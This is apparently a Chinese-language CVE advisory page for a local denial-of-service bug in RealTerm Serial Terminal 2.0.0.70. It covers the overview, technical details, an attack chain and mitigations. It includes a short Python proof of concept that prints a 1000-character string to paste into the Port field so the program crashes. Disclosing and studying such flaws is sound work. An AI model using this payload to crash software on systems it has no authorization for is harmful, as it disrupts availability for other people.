CVE-2019-25570 CVSS 5.5 中危

CVE-2019-25570: RealTerm拒绝服务漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25570

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

RealTerm Serial Terminal

漏洞概述

RealTerm Serial Terminal 2.0.0.70版本存在拒绝服务漏洞。该漏洞源于程序未正确处理用户输入，攻击者可在Port字段输入超长字符串（约1000字符），导致应用程序崩溃。攻击者需具有本地访问权限并进行简单交互即可触发该漏洞，造成服务不可用。

技术细节

该漏洞是由于 RealTerm Serial Terminal 在处理用户界面输入时，缺乏对输入字符串长度的适当校验而导致的缓冲区溢出型拒绝服务漏洞。在受影响的版本（2.0.0.70）中，Port 输入字段对应的内存缓冲区大小有限，但程序在接收数据时未进行边界检查。攻击者通过在本地系统中构造一个包含约 1000 个字符的特定长字符串（例如重复的 'A'），并将其粘贴到 Port 字段中。当攻击者或被诱导的用户点击“Open”按钮时，程序会调用内部函数读取该字段内容。由于输入长度超过了预设缓冲区的容量，多余的数据会溢出并覆盖栈上的返回地址或其他关键数据结构。这导致程序执行流程发生混乱，最终触发非法内存访问异常，迫使应用程序终止。虽然该漏洞主要影响可用性（A:H），且需要本地交互（UI:R），但它展示了常见的输入验证缺失问题。

攻击链分析

STEP 1

步骤1

攻击者获取本地系统访问权限，并能够操作RealTerm应用程序。

STEP 2

步骤2

攻击者构造一个包含约1000个字符的特定长字符串。

STEP 3

步骤3

攻击者将该字符串复制并粘贴到RealTerm的Port输入字段中。

STEP 4

步骤4

攻击者点击界面上的Open按钮，触发程序读取输入。

STEP 5

步骤5

程序发生缓冲区溢出或内存错误，导致应用程序崩溃（拒绝服务）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2019-25570
# This script generates a malicious string to crash RealTerm Serial Terminal

import sys

def generate_payload(length=1000):
    """Generates a buffer of 'A' characters."""
    return "A" * length

if __name__ == "__main__":
    payload = generate_payload(1000)
    print("[+] Payload generated successfully.")
    print("[+] Payload length: {}".format(len(payload)))
    print("[+] Copy the payload below and paste it into the 'Port' field of RealTerm.")
    print("[+] Click the 'Open' button to trigger the crash.")
    print("-" * 20)
    print(payload)

影响范围

RealTerm Serial Terminal 2.0.0.70

防御指南

临时缓解措施

建议用户在获得官方补丁前，避免在Port字段粘贴来源不明或过长的数据。同时，应仅允许受信任的用户在本地运行该应用程序，并确保系统及时更新安全软件以检测潜在的异常崩溃行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表